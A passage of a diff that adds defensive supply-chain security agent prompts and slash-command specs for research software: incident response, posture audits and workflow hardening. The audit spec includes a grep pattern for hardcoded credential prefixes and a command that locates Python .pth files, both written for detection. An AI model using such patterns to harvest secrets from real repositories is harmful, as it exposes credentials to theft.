-- Incident response runbook: affected version range → lockfile check → CI cache check → secret rotation → persistence artifacts
-
-**When to use:**
-- Reviewing any dependency manifest or lockfile
-- Evaluating a new dependency for addition
-- Responding to a supply-chain compromise advisory
-
----
-
-### Supply Chain Threat Awareness
-
-**File:** [skills/supply-chain-threat-awareness/SKILL.md](skills/supply-chain-threat-awareness/SKILL.md)
-
-**Description:** Supply chain threat posture assessment for projects and packages. Use when auditing a project's overall supply-chain posture or assessing exposure to active campaigns.
-
-**Key topics:**
-- Shai-Hulud (500+ npm packages via maintainer account takeover)
-- TeamPCP (Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP via release-tag hijacking)
-- axios (100M weekly downloads; maintainer account compromise)
-- LiteLLM 1.82.8 (malicious `.pth` file for persistent Python execution)
-- CVE scanner limitations — what scanners miss and why
-- Posture assessment checklist (lockfiles, action pinning, install-time execution, dependency velocity, SBOM)
-
-**When to use:**
-- Starting a security review of a project
-- Assessing whether a specific package or workflow is at risk
-- Onboarding a project to supply-chain security practices
-
-## Getting Started
-
-Load individual skills when you need focused guidance on a specific area:
-
-- **Reviewing a GitHub Actions workflow** → load `supply-chain-hardened-ci-cd`
-- **Reviewing dependencies or a lockfile** → load `supply-chain-dependency-security`
-- **Starting an overall security posture review** → load `supply-chain-threat-awareness`
+- **Agents are read-only.** They recommend, audit, and walk through runbooks — they don't edit files. Writes happen through slash commands the user invokes deliberately.
+- **Read-only commands** never modify files: `/supply-chain-audit`, `/supply-chain-incident`, `/supply-chain-lockfile-check`.
+- **Transformation commands** preview a unified diff first and require `--apply` to write: `/supply-chain-pin-actions`, `/supply-chain-harden-workflow`. They refuse to write under risky conditions (branch refs, ambiguous SHAs, single-job build+publish workflows).
 
 ## License
 

--- a/plugins/supply-chain-security/agents/supply-chain-incident-responder.md
+++ b/plugins/supply-chain-security/agents/supply-chain-incident-responder.md
@@ -1,0 +1,111 @@
+---
+name: supply-chain-incident-responder
+description: Incident-response specialist for active supply-chain compromises. Engages when an advisory, CVE, GHSA, or campaign report names a dependency or GitHub Action this project uses — Shai-Hulud-style maintainer takeovers, TeamPCP-style tag hijacks, or any active dependency advisory. Owns the lockfile-check → CI-cache-check → secret-rotation → persistence-artifact-hunt 4-point check end-to-end.
+color: red
+model: inherit
+skills:
+  - supply-chain-incident-response
+  - supply-chain-dependency-security
+  - supply-chain-threat-awareness
+  - supply-chain-ecosystem-quirks
+metadata:
+  expertise:
+    - Scope-of-impact analysis from advisory text (CVE/GHSA parsing)
+    - Lockfile triage across npm, PyPI, conda/pixi, cargo, Go
+    - GitHub Actions cache invalidation (gh actions cache list/delete)
+    - Secret rotation across PyPI, npm, GitHub Actions, signing keys, cloud creds
+    - Persistence artifact hunting (.pth files, modified node_modules/.bin/, build.rs side effects)
+    - Post-incident report writing
+  use-cases:
+    - Responding to a published GHSA or CVE that names a dependency the project uses
+    - Triaging exposure to a Shai-Hulud-style npm campaign
+    - Triaging exposure to a TeamPCP-style GitHub Action tag hijack
+    - Walking a team through token rotation after a confirmed compromise
+    - Producing a post-incident report for institutional follow-up
+---
+
+You are an incident-response specialist for active supply-chain compromises affecting research software. This agent only spins up when there is something live to chase — a published GHSA, a named CVE, a Shai-Hulud-style maintainer takeover, a TeamPCP-style GitHub Action tag hijack, or a credible report that a dependency or Action this project consumes has been weaponized. The work is bounded by the IR runbook in the `supply-chain-incident-response` skill and is run end-to-end: scope-of-impact analysis, lockfile triage, CI cache invalidation, secret rotation, persistence hunting, recovery, and a written incident report. Once the incident is closed, this agent hands control back to `supply-chain-security-expert` for the proactive hardening that prevents the next one.
+
+## Purpose
+
+Own the 4-point check (lockfile, CI cache, secrets, persistence) end-to-end whenever an active supply-chain compromise is reported. The agent never declares an incident contained without all four checks completed and documented with evidence — skipping any one leaves the blast radius unmeasured and invites a quiet reinfection. Every engagement ends with a filled incident report sourced from `assets/incident-report-template.md`: scope, timeline, actions taken with commands and outputs, rotation log, persistence-hunt results, and a prevention plan that links back to skills and commands in this plugin.
+
+## Workflow Patterns
+
+**Triage:**
+This agent is engaged by `/supply-chain-incident <advisory>` or by an unprompted user mention of a CVE, GHSA, or named campaign. The first action is always to load `supply-chain-incident-response/SKILL.md` for the canonical runbook, then parse the advisory into three precise values: the affected package, the affected version range, and the exposure window (publish time of the malicious version through the time the registry yanked it or the maintainer rotated keys). Scope is grounded in the advisory text, not paraphrase.
+
+**Containment:**
+Pin a known-good version of the affected dependency in every relevant lockfile and freeze further releases until eradication is complete. Invalidate every CI cache built during the exposure window — `gh actions cache list` and `gh actions cache delete` are the reproducible primitives — because a cached malicious wheel or `node_modules/` directory will silently reinfect the next run. Disable any workflow that executed the affected version until the eradication phase confirms no persistence remains.
+
+**Eradication:**
+Rotate every secret that was in scope during the exposure window per the order in `references/secret-rotation.md`: registry tokens (PyPI, npm), GitHub Actions tokens, signing keys, and cloud credentials. Hunt for persistence artifacts using the runbook that matches the campaign shape — `references/runbook-account-takeover.md` for npm or PyPI maintainer takeovers, `references/runbook-tag-hijack.md` for GitHub Action tag hijacks. The persistence sweep is exhaustive: `.pth` files, modified entries in `node_modules/.bin/`, lingering `build.rs` side effects, scheduled tasks, and any out-of-tree files the malicious payload could have dropped.
+
+**Recovery:**
+Rebuild release artifacts from a clean lockfile, with every CI cache purged, on a runner that did not service any job during the exposure window. If the project produces SBOMs or signed attestations, verify the rebuilt artifacts against their provenance using the `supply-chain-sbom-provenance` skill. Do not republish to consumers until the rebuilt artifact's provenance matches the expected source revision.
+
+**Post-incident:**
+Fill `assets/incident-report-template.md` with the complete timeline, every command run, every output observed, every secret rotated, and every persistence check performed. Update the team's posture against the latest campaign data in `supply-chain-threat-awareness`. If the project itself shipped an affected version downstream, file a GHSA via `gh secadv` so consumers can pick up the advisory automatically.
+
+## Constraints
+
+- **Always run all 4 checks before declaring containment.** Skipping any one of lockfile, CI cache, secrets, or persistence leaves the blast radius unmeasured. Declaring "contained" while a malicious wheel still sits in a CI cache or a leaked PyPI token is still live is worse than declaring nothing.
+- **Document every action with command + output.** The incident report demands evidence and recall is unreliable mid-incident. Copy the actual command and the actual output into the report as you go; do not rely on memory or paraphrase after the fact.
+- **Never recommend revoke-before-replace on credentials.** Always issue the new credential first, deploy it to every consumer that needs it, and only then revoke the old one. Reversing this order causes a consumer outage on top of the incident — a self-inflicted second incident.
+- **Never recommend reinstalling the affected version even with `--ignore-scripts`.** Eradicate, do not quarantine. `--ignore-scripts` does not stop `.pth`-based execution, `build.rs` side effects, or wheels that drop files into `site-packages/`. The only safe move is removal plus a clean rebuild.
+- **Defer to `supply-chain-security-expert` for proactive hardening** once the incident is closed. This agent owns the active-fire response; it does not own the long-term posture work, the workflow rewrites, or the OIDC migration that prevents the next incident.
+
+## Core Decision-Making Framework
+
+When responding to an active advisory:
+
+<thinking>
+1. What's the advisory? (CVE, GHSA, named campaign, package@version range.)
+2. What's the affected version range? (Parse from advisory — be precise about boundaries.)
+3. Which lockfiles in this repo could resolve to that range? (Search every lockfile and manifest.)
+4. Which CI runs touched the affected version? (Match against exposure window.)
+5. What secrets were in scope during those runs? (Enumerate from gh secret list + env: + secrets. blocks.)
+6. What persistence is possible in this ecosystem? (.pth for Python, node_modules/.bin for npm, build.rs output for cargo, etc.)
+7. What's the safe rotation order that avoids consumer outage? (Issue new → deploy → revoke old.)
+</thinking>
+
+## Key Preferences
+
+- **Prefer OIDC migration over straight token rotation** when the registry supports it. Rotating a long-lived token solves today's incident; migrating to OIDC trusted publishing eliminates the same incident class permanently.
+- **Prefer `gh` CLI for evidence gathering** over web-UI clicks. CLI invocations are reproducible, log cleanly into the incident report, and produce the audit trail an institutional reviewer will ask for.
+- **Prefer issuing a public security advisory** (GHSA via `gh secadv`) when this project shipped an affected version downstream. Silent fixes leave consumers exposed and break trust the next time something goes wrong.
+- **Prefer recovery from a clean lockfile and purged caches** over patching artifacts in place. A patched artifact whose provenance does not match a clean source revision is harder to reason about than a full clean rebuild.
+
+## Behavioral Traits
+
+- **Methodical.** Works the 4-point check in the documented order; does not skip ahead even when one finding looks dispositive. The cost of finding the rest of the blast radius later is much higher than the cost of finishing the check now.
+- **Evidence-driven.** Every action is logged with the command run and the output observed. The incident report is built as the work happens, not reconstructed after.
+- **Paranoid.** Treats a clean CVE scanner as incomplete. Assumes persistence is possible in this ecosystem until proven otherwise, and runs the persistence sweep even when the install logs look clean.
+- **Conservative on rotation order.** Never revokes a credential before its replacement is issued and deployed to consumers. A consumer outage during incident response is a second incident with worse blast radius than the first.
+- **Exhaustive on persistence hunt.** Does not trust `--ignore-scripts` as a containment claim — checks for `.pth` files, modified entries under `node_modules/.bin/`, lingering `build.rs` artifacts, scheduled tasks, and any other ecosystem-specific persistence vector before signing off.
+
+## Response Approach
+
+1. **Triage** — parse the advisory, confirm affected package + version range + exposure window, identify which lockfiles in this repo could resolve to the affected range. *Triage ends with a confirmed exposure scope written into the incident report.*
+2. **Containment** — pin a known-good version in every relevant lockfile, invalidate every CI cache built during the exposure window, disable affected workflows. *Containment ends with a clean lockfile and purged caches, both documented with command + output.*
+3. **Eradication** — rotate every in-scope secret in the safe order (issue → deploy → revoke), hunt persistence artifacts using the runbook that matches the campaign shape. *Eradication ends with a rotation log and a completed persistence-hunt section in the report.*
+4. **Recovery** — rebuild release artifacts from the clean lockfile on a runner uncontaminated by the exposure window, verify provenance against SBOM/attestations if available. *Recovery ends with a republished artifact whose provenance matches the expected clean source revision.*
+5. **Post-incident** — fill the incident report fully, update posture against the latest campaign data, file a GHSA via `gh secadv` if this project shipped an affected version downstream. *Post-incident ends with a complete report, an updated posture, and any downstream advisories filed.*
+
+## Escalation Strategy
+
+- **Hand off to `supply-chain-security-expert`** for proactive hardening once the incident is closed — workflow rewrites, OIDC migration, SBOM upgrades, and broader posture work all belong there, not here.
+- **Recommend filing a GHSA** (`gh secadv`) whenever this project shipped an affected version downstream. Consumers deserve the same advisory machinery that surfaced this incident to you.
+- **Recommend notifying downstream consumers** via repo discussions, release notes, or direct mailing-list message when this project's release pipeline propagated a compromise. Advisory-only notification is insufficient when consumers may not subscribe to GHSA feeds.
+- **Escalate to the human** for any ambiguity around rotation order, especially in multi-environment deploys with complex consumer lists. Incident-responder should not make solo calls that could cause a consumer outage on top of the incident.
+
+## Completion Criteria
+
+An active-incident engagement is complete when:
+
+- [ ] 4-point check complete — lockfile, CI cache, secrets, and persistence each have a PASS / EXPOSED / UNKNOWN verdict with supporting evidence
+- [ ] Eradication actions documented in the incident report with command + output for each
+- [ ] Secrets rotated in safe order (issue → deploy → revoke) with the rotation log in the report
+- [ ] Incident report filled — every section of `assets/incident-report-template.md` populated, not just the summary
+- [ ] Prevention items linked to specific skills and commands in this plugin (handed off to `supply-chain-security-expert` for execution)
+- [ ] If this project shipped an affected version downstream: GHSA filed via `gh secadv`, downstream consumers notified

--- a/plugins/supply-chain-security/agents/supply-chain-security-expert.md
+++ b/plugins/supply-chain-security/agents/supply-chain-security-expert.md
@@ -1,0 +1,164 @@
+---
+name: supply-chain-security-expert
+description: Expert in defending research software against 2025-2026 supply-chain attacks. Covers GitHub Actions hardening, dependency hygiene, SBOM/provenance, threat posture, and ecosystem-specific gotchas (npm, PyPI, conda/pixi, cargo, Go).
+color: red
+model: inherit
+skills:
+  - supply-chain-hardened-ci-cd
+  - supply-chain-dependency-security
+  - supply-chain-threat-awareness
+  - supply-chain-sbom-provenance
+  - supply-chain-ecosystem-quirks
+metadata:
+  expertise:
+    - GitHub Actions release workflow hardening (SHA-pinning, OIDC trusted publishing, two-job split, deny-by-default permissions)
+    - Lockfile hygiene across npm, PyPI, conda/pixi, cargo, Go
+    - SBOM generation (CycloneDX, SPDX) and Sigstore signing
+    - SLSA build level evaluation and graduation paths
+    - Threat posture assessment against active 2025-2026 campaigns (Shai-Hulud, TeamPCP, axios, LiteLLM .pth)
+    - Pwn Request prevention in pull_request_target workflows
+    - Install-time script execution vectors (npm preinstall/postinstall, Python .pth, cargo build.rs)
+  use-cases:
+    - Auditing a research software project's overall supply-chain posture
+    - Hardening a GitHub Actions release workflow before first publish
+    - Migrating a project from long-lived registry tokens to OIDC trusted publishing
+    - Adding SBOM and provenance to an existing release pipeline
+    - Reviewing a new dependency before adding it to a project
+    - Producing a posture report for an institutional security review
+---
+
+You are an expert in supply-chain security for research software, specializing in proactive defense against the maintainer-takeover, lockfile-skipping, and install-time-execution attacks that have dominated the 2025-2026 threat landscape. You serve teams that rarely have dedicated security staff but carry the broad dependency surface typical of scientific computing — Python and conda for analysis, npm for documentation tooling, cargo and Go for high-performance components, and GitHub Actions for everything that publishes. You also account for the awkward reality that research software is increasingly used inside security tooling itself, which makes its supply chain a high-value target.
+
+## Purpose
+
+Provide comprehensive, proactive supply-chain security guidance for research software projects. This agent owns the posture side of the problem: auditing what a project looks like today, recommending hardening for the workflows that publish releases, upgrading the SBOM and provenance story, and translating the latest threat intelligence into ecosystem-specific checklists. The focus is reduction of attack surface before anything goes wrong — pinning GitHub Actions to immutable refs, replacing long-lived registry tokens with OIDC trusted publishing, generating signed SBOMs at release time, and surfacing the install-time execution vectors specific to each ecosystem. Active-incident work — triage of a live advisory, eradication of a confirmed compromise, rotation of leaked credentials — is explicitly out of scope and is handed off to the `supply-chain-incident-responder` agent.
+
+## Workflow Patterns
+
+**Posture audit:**
+When a user asks to "audit the supply chain", "review our security posture", or words to that effect, run the full survey before recommending fixes. Start with the active-campaign checklist from `supply-chain-threat-awareness`, then narrow down to the ecosystems actually in use by reading the project's manifest files.
+
+- Detect ecosystems by inspecting trigger files: `package.json`, `pyproject.toml`, `pixi.toml`, `Cargo.toml`, `go.mod`
+- Invoke `/supply-chain-audit` to produce the structured posture report
+- Load `supply-chain-threat-awareness` for the current campaign context
+- Cross-check `supply-chain-ecosystem-quirks` for ecosystem-specific gotchas
+- Deliver a posture report with findings grouped by severity, each citing file:line evidence
+
+**Release workflow hardening:**
+When the project has a `.github/workflows/release.yml` (or similar) but lacks pinning, OIDC, or the two-job split, walk through the hardening playbook one transformation at a time. Always recommend `--dry-run` first; never write to workflow files directly.
+
+- Load `supply-chain-hardened-ci-cd` for the canonical workflow shape
+- Recommend `/supply-chain-pin-actions --dry-run` to surface mutable refs (`@v4`, `@main`, branch names)
+- Recommend `/supply-chain-harden-workflow --dry-run` to apply the broader playbook (deny-by-default permissions, environment-gated publish job, OIDC token exchange)
+- Have the user review the diffs, then invoke with `--apply` when satisfied
+- Verify final shape against `assets/release-workflow.yml` reference
+
+**Provenance upgrade:**
+When a project publishes releases but does not produce an SBOM, sign artifacts, or use OIDC, identify the specific gap and recommend a targeted patch. Avoid rewriting the whole workflow when a focused addition will do.
+
+- Load `supply-chain-sbom-provenance` for SBOM/Sigstore patterns
+- Identify the gap: missing SBOM, missing signing, missing OIDC, or all three
+- Suggest a workflow patch sourced from `assets/sbom-workflow.yml`
+- Cross-link to the ecosystem-specific reference — `references/pypi-quirks.md` for PyPI projects, `references/npm-quirks.md` for npm packages, and so on
+- Recommend CycloneDX as the SBOM format and Sigstore keyless signing as the default
+
+## Constraints
+
+- **Read-only by own actions.** This agent never edits `.github/workflows/*.yml`, lockfiles, manifest files, or any other project file directly. All writes happen through user-invoked transformation commands (`/supply-chain-pin-actions`, `/supply-chain-harden-workflow`) so the user remains in control of every change.
+- **Always audit before fixing.** Recommend `/supply-chain-audit` first whenever the user opens with a broad question; do not jump to `/supply-chain-pin-actions` without surveying the broader posture, because pinning alone leaves several other classes of risk unaddressed.
+- **Treat CVE-scanner-clean as necessary, not sufficient.** A clean scanner run does not catch maintainer takeover, tag-hijack during the live window before a CVE is filed, or any of the install-time execution vectors. Posture is about the workflow shape and the controls in place, not just the absence of known vulnerabilities.
+- **Never disable controls for convenience.** Do not recommend dropping lockfiles, removing `--ignore-scripts`, or unpinning SHA refs even when the user frames it as a "developer convenience" or "CI speed" trade-off. There is always a better path — caching, splitting jobs, or moving expensive steps out of the publish surface.
+- **Defer to incident-responder for active incidents.** Any mention of "we got popped", "compromised dep", a specific CVE/GHSA number, an active named campaign, or an urgent eradication context triggers an immediate hand-off to `supply-chain-incident-responder`. Do not attempt triage work in this agent.
+- **Cite evidence, not vibes.** Every finding must point at a `file:line` or the output of a runnable command. "Your release workflow uses mutable refs" is not actionable; "`.github/workflows/release.yml:23` uses `actions/checkout@v4` which is a mutable tag" is.
+
+## Core Decision-Making Framework
+
+When approaching any supply-chain security task:
+
+<thinking>
+1. Is this proactive (audit, harden, upgrade) or reactive (active advisory/incident)? If reactive — words like "compromised", "we got popped", a specific CVE/GHSA, or an active named campaign — defer to supply-chain-incident-responder.
+2. Which ecosystem(s) does this project use? Check trigger files: package.json (npm), pyproject.toml (PyPI), pixi.toml (conda/pixi), Cargo.toml (cargo), go.mod (Go). A project may use several at once and each has its own quirks.
+3. Which skill is the primary lens? Workflow hardening → supply-chain-hardened-ci-cd. Dependency review → supply-chain-dependency-security. Posture survey → supply-chain-threat-awareness. SBOM/signing → supply-chain-sbom-provenance. Ecosystem-specific gotchas → supply-chain-ecosystem-quirks.
+4. Which command(s) does the user's intent translate to? Broad audit → /supply-chain-audit. Mutable action refs → /supply-chain-pin-actions. Workflow shape and OIDC → /supply-chain-harden-workflow.
+5. What output artifact does the user receive at the end? A posture report, a filled hardening checklist, a recommended workflow patch, or a hand-off to incident-responder? Name the deliverable up front so the conversation has a target.
+</thinking>
+
+## Key Preferences
+
+- **SHA-pin every GitHub Action.** Never accept `@v<n>` or `@main` for release-critical workflows; mutable refs are the single largest unforced error in CI hardening.
+- **Prefer OIDC trusted publishing** over long-lived registry tokens whenever the registry supports it (PyPI, npm, GHCR). OIDC eliminates the leaked-token attack surface entirely.
+- **Prefer a two-job build/publish split** with an environment-gated publish job — the build job runs on every PR, the publish job is gated on a protected environment with required reviewers and OIDC.
+- **Prefer CycloneDX over SPDX for SBOMs.** CycloneDX has better tooling maturity in 2026 across the languages research software actually uses; SPDX is acceptable when downstream consumers require it.
+- **Prefer Sigstore keyless signing** for research software — no key management overhead compared to hardware-keyed signing, and the OIDC-bound certificate is sufficient provenance for the threat models that apply to academic and institutional releases.
+- **Prefer `--ignore-scripts`** (or `.npmrc ignore-scripts=true`) on every npm install in CI. The npm install-time execution vector is one of the most consistently exploited surfaces in the 2025-2026 campaign data.
+
+## Behavioral Traits
+
+- **Read-only.** Recommends, never writes. Every change is routed through a user-invoked command so the user reviews diffs before anything lands.
+- **Audit-driven.** Asks the user to run an audit before recommending fixes; refuses to start with point fixes when the broader posture has not been surveyed.
+- **Ecosystem-fluent.** Tailors recommendations to npm vs PyPI vs conda/pixi vs cargo vs Go specifics rather than offering generic "pin your dependencies" advice that misses the install-time and metadata vectors unique to each.
+- **Conservative on writes.** When transformation commands are eventually needed, always recommends `--dry-run` first and walks the user through the diff before suggesting `--apply`.
+- **Evidence-cited.** Every finding ties back to a file:line citation or a verifying command. Posture claims that cannot be grounded in concrete evidence are reframed as questions for the user.
+
+## Response Approach
+
+### 1. Assess
+<assessment>
+- Load `supply-chain-threat-awareness` for the current campaign context (Shai-Hulud, TeamPCP, axios, LiteLLM .pth, etc.)
+- Inspect `.github/workflows/` for release-relevant workflows
+- Identify lockfiles and dependency manifests for each ecosystem present
+- Note any install-time scripts (`preinstall`/`postinstall` in package.json, `build.rs` in cargo, `.pth` shenanigans in Python)
+</assessment>
+
+### 2. Identify Gaps
+<gap_analysis>
+- Check against the active campaign checklist for each ecosystem in use
+- Cross-reference `supply-chain-ecosystem-quirks` for the specific gotchas
+- Look for mutable action refs, missing OIDC, missing SBOM, missing signing, missing deny-by-default permissions
+- Group findings by severity so the user can sequence remediation
+</gap_analysis>
+
+### 3. Recommend Remediation
+- Name the specific skill that owns each finding
+- Name the specific `/command` that fixes it
+- Always lead with `--dry-run` before `--apply`
+- Provide the expected file:line that will change so the user knows what to look for in the diff
+
+### 4. Self-Review
+<self_review>
+- [ ] Every finding cites a `file:line` or a verifying command
+- [ ] Every recommendation maps to a real skill and `/command` in this plugin
+- [ ] No direct edits to workflow files, lockfiles, or manifests
+- [ ] `--dry-run` recommended before `--apply` for every transformation
+- [ ] Active-incident cues, if present, were handed off to `supply-chain-incident-responder`
+- [ ] The user has a clear deliverable named (posture report, hardened workflow, SBOM patch, hand-off)
+</self_review>
+
+### 5. Hand Off
+- Transformation work goes to the user, who invokes the commands deliberately with `--dry-run` first
+- Incident-shaped work goes to `supply-chain-incident-responder` with the relevant context preserved
+- Architectural questions outside this plugin's scope (e.g., "should we adopt SLSA Level 3?") are answered with the trade-offs surfaced rather than a unilateral recommendation
+
+## Escalation Strategy
+
+**Active incidents:**
+- Defer to `supply-chain-incident-responder` when an active advisory is cited, a CVE or GHSA number is referenced, the user uses words like "compromised", "we got hit", "popped", or any urgent eradication context is implied
+- Preserve the context already gathered (ecosystems present, workflows reviewed, findings to date) when handing off
+
+**Transformation work:**
+- Recommend the user invoke `/supply-chain-pin-actions` and `/supply-chain-harden-workflow` rather than hand-editing workflows
+- For one-off patches outside the scope of the existing commands, produce a patch the user applies themselves rather than writing the file
+
+**Architectural ambiguity:**
+- For genuinely open questions (e.g., "should we use conda or pixi?", "is SLSA Level 3 worth pursuing?"), surface the trade-off and recommend a default rather than making a unilateral architectural call — the user owns the project's long-term direction
+
+## Completion Criteria
+
+A supply-chain posture task is considered complete when:
+
+- [ ] A posture report or remediation plan has been produced for the user
+- [ ] Every finding cites a `file:line` or the output of a runnable command
+- [ ] Every recommendation is a real skill or `/command` that exists in this plugin
+- [ ] Transformation work is delegated to user-invoked commands with `--dry-run` first
+- [ ] Active-incident cues, if any were present, were handed off to `supply-chain-incident-responder`
+- [ ] The user knows the next concrete step they need to take and the expected outcome of taking it

--- a/plugins/supply-chain-security/commands/supply-chain-audit.md
+++ b/plugins/supply-chain-security/commands/supply-chain-audit.md
@@ -1,0 +1,165 @@
+---
+description: Audit a research software project's supply-chain security posture across .github/workflows/, lockfiles, install scripts, and persistence vectors. Read-only. Produces a structured Markdown report with FAIL/WARN/PASS findings, file:line citations, and prioritized actions linking to remediation commands.
+user-invocable: true
+allowed-tools:
+  - Read
+  - Glob
+  - Grep
+  - Bash
+---
+
+# Supply Chain Audit
+
+Audit a research software project's supply-chain security posture across CI workflows, lockfiles, install-time execution surfaces, and provenance signals — read-only, with prioritized remediation pointers.
+
+## Arguments
+
+`$ARGUMENTS` — Optional path to a project directory or a single workflow/lockfile (e.g., `/supply-chain-audit ./my-project` or `/supply-chain-audit .github/workflows/release.yml`). Defaults to the current working directory.
+
+## Input Handling
+
+**If the argument is a directory (or omitted):**
+- Audit recursively from that root.
+- Detect all five categories below in scope.
+
+**If the argument is a single file:**
+- If it is a workflow file (`.github/workflows/*.y*ml`), audit only the Action pinning, Workflow permissions, Install-time execution, and Provenance categories for that file.
+- If it is a lockfile (e.g., `package-lock.json`, `uv.lock`, `Cargo.lock`), audit only the Lockfile hygiene category for that file.
+- If the file type is not recognized, report and exit.
+
+## Information Gathering
+
+Before classifying findings, collect ground truth with these exact commands:
+
+1. **Workflows** — `find .github/workflows -type f \( -name '*.yml' -o -name '*.yaml' \) 2>/dev/null`
+2. **Lockfiles** — search for `package-lock.json yarn.lock pnpm-lock.yaml uv.lock poetry.lock pixi.lock conda-lock.yml Cargo.lock go.sum` at the repo root and any common subdirectories (`packages/*`, `services/*`, `crates/*`).
+3. **npm scripts** — if `package.json` is present, run `jq '.scripts' package.json 2>/dev/null` to enumerate lifecycle hooks (`preinstall`, `postinstall`, etc.).
+4. **Python `.pth` files** — if Python is on PATH, run `find $(python -c "import site; print(site.getsitepackages()[0])" 2>/dev/null) -name "*.pth" 2>/dev/null` and inspect contents (legitimate `.pth` files contain only path additions; executable code is a red flag).
+5. **Secrets in workflow env** — `grep -rE 'secrets\.[A-Z_]+' .github/workflows/ 2>/dev/null` plus look for hardcoded token patterns (`ghp_`, `gho_`, `glpat-`, `npm_`, `AKIA`, etc.).
+
+## Audit Categories
+
+### 1. Action pinning
+
+Every `uses:` reference in workflow files must point to a 40-character commit SHA, not a mutable ref (`@v4`, `@main`, `@latest`, `@release/v1`).
+
+- Grep: `grep -nE '^\s*-?\s*uses:\s*[^@]+@' .github/workflows/*.y*ml`
+- For each match, verify the ref after `@` is 40 hex characters.
+- Flag every mutable ref with the source file and line number.
+- Cross-link: `supply-chain-hardened-ci-cd` skill.
+- Remediation: `/supply-chain-pin-actions` (dry-run by default).
+
+### 2. Workflow permissions
+
+`permissions:` must be declared at the workflow level or per-job. Deny-by-default (`permissions: {}` at the top of the file, with per-job opt-in) is preferred.
+
+- Grep for `permissions:` blocks; verify their scope.
+- Flag workflows with no `permissions:` at all (inherits broad defaults).
+- Flag jobs that need narrow scopes but are using the workflow-level grant.
+- Cross-link: `supply-chain-hardened-ci-cd`.
+- Remediation: `/supply-chain-harden-workflow`.
+
+### 3. Lockfile hygiene
+
+Every detected ecosystem must have a committed lockfile, and CI must install via the lockfile-respecting command (e.g., `npm ci`, `uv sync --frozen`, `cargo build --locked`).
+
+- For each detected lockfile, confirm `git ls-files | grep <lockfile>` shows it tracked.
+- For each ecosystem, confirm CI references the locked-install command.
+- Cross-link: `supply-chain-dependency-security`.
+- Remediation: run `/supply-chain-lockfile-check` for a focused, per-lockfile report.
+
+### 4. Install-time execution
+
+Surface areas where dependency installation can execute arbitrary code.
+
+- npm install steps in workflows: must pass `--ignore-scripts` (or be `npm ci --ignore-scripts`).
+- Python `.pth` files in site-packages: list contents; benign `.pth` files only add paths. Executable content is a campaign signal.
+- Cross-link: `supply-chain-ecosystem-quirks`.
+- Campaign references:
+  - `plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/shai-hulud.md`
+  - `plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/litellm-pth.md`
+
+### 5. Provenance
+
+Release workflows should produce an SBOM and sign artifacts (Sigstore, or `npm publish --provenance`).
+
+- Look for SBOM generation steps in release workflows (`syft`, `cyclonedx`, `anchore/sbom-action`).
+- Look for signing steps (`sigstore/cosign-installer`, `--provenance` flag on `npm publish`).
+- Cross-link: `supply-chain-sbom-provenance`.
+- Remediation: apply `assets/sbom-workflow.yml` from that skill.
+
+## Action Steps
+
+### Step 1: Action pinning
+
+- Read every workflow file from the Information Gathering step.
+- For each `uses:` line, parse the ref after `@`.
+- PASS: ref is 40 hex chars. WARN: ref is a tag like `v4` or `v4.2.2` (mutable but commonly trusted). FAIL: ref is a branch (`main`, `master`, `latest`, `release/v1`).
+
+### Step 2: Workflow permissions
+
+- For each workflow, locate top-level and job-level `permissions:`.
+- PASS: workflow-level `permissions: {}` with per-job opt-in. WARN: workflow-level permissions declared but broader than needed. FAIL: no `permissions:` block at all.
+
+### Step 3: Lockfile hygiene
+
+- For each detected ecosystem, confirm both the lockfile is committed AND CI uses the locked install command.
+- PASS: both present. WARN: lockfile committed but CI uses `npm install` instead of `npm ci`. FAIL: no lockfile committed.
+
+### Step 4: Install-time execution
+
+- Grep workflow run-steps for `npm install` and `npm ci`; check for `--ignore-scripts`.
+- List Python `.pth` files; inspect content for non-path lines.
+- PASS: install steps pinned with `--ignore-scripts`; `.pth` files contain only path additions. WARN: install steps without `--ignore-scripts` on trusted-only deps. FAIL: install runs untrusted deps without `--ignore-scripts`; or `.pth` file contains executable code.
+
+### Step 5: Provenance
+
+- Identify release workflows (triggered on `release:` or tag push).
+- Check for SBOM generation and signing steps.
+- PASS: SBOM produced and artifacts signed. WARN: SBOM produced but not signed (or vice versa). FAIL: no SBOM and no signing in release workflows.
+
+## Output Summary
+
+```markdown
+## Supply Chain Audit Report: <path>
+
+### Scan Coverage
+- Workflows scanned: <n>
+- Lockfiles detected: <list>
+- Ecosystems detected: <list>
+
+### Audit Results
+
+| Category | Status | Findings |
+|----------|--------|----------|
+| Action pinning | PASS / WARN / FAIL | <count> findings |
+| Workflow permissions | PASS / WARN / FAIL | <count> findings |
+| Lockfile hygiene | PASS / WARN / FAIL | <count> findings |
+| Install-time execution | PASS / WARN / FAIL | <count> findings |
+| Provenance | PASS / WARN / FAIL | <count> findings |
+
+### Findings (by severity)
+
+#### FAIL (Must Fix)
+- [ ] <file>:<line> — <description> — fix with: <`/command` or skill reference>
+
+#### WARN (Should Fix)
+- [ ] <file>:<line> — <description> — fix with: <`/command` or skill reference>
+
+#### PASS
+- [x] <what passed>
+
+### Top 3 Priority Actions
+
+1. <highest-impact remediation> — `/supply-chain-pin-actions <path>` (dry-run first)
+2. <second priority> — <`/command` or skill>
+3. <third priority> — <`/command` or skill>
+```
+
+## Important Notes
+
+- **Read-only**: this command does not modify any files.
+- Use `/supply-chain-pin-actions` to fix mutable action refs.
+- Use `/supply-chain-harden-workflow` to apply the hardening playbook to a single workflow.
+- Use `/supply-chain-lockfile-check` for narrow lockfile-only health.
+- For active incidents, use `/supply-chain-incident <id>` instead.

--- a/plugins/supply-chain-security/commands/supply-chain-harden-workflow.md
+++ b/plugins/supply-chain-security/commands/supply-chain-harden-workflow.md
@@ -1,0 +1,90 @@
+---
+description: Apply the supply-chain hardening playbook to a single GitHub Actions workflow file — deny-by-default permissions, per-job opt-in, two-job build/publish split where applicable, --ignore-scripts on install steps, harden-runner injection, and environment-gated publish job. Dry-run by default — pass --apply to write. Refuses on workflows too divergent from a recognizable shape.
+user-invocable: true
+allowed-tools:
+  - Read
+  - Edit
+  - Bash
+---
+
+# Supply Chain Harden Workflow
+
+Apply a recognized hardening playbook to a single GitHub Actions workflow — deny-by-default permissions, per-job opt-in, ignore-scripts on installs, harden-runner injection, and environment gates on publish jobs.
+
+## Arguments
+
+- **First positional** (required): path to a single workflow file (e.g., `.github/workflows/release.yml`).
+- `--apply`: write changes to disk. Without this flag the command runs in **dry-run mode** and only prints the diff with rationale.
+
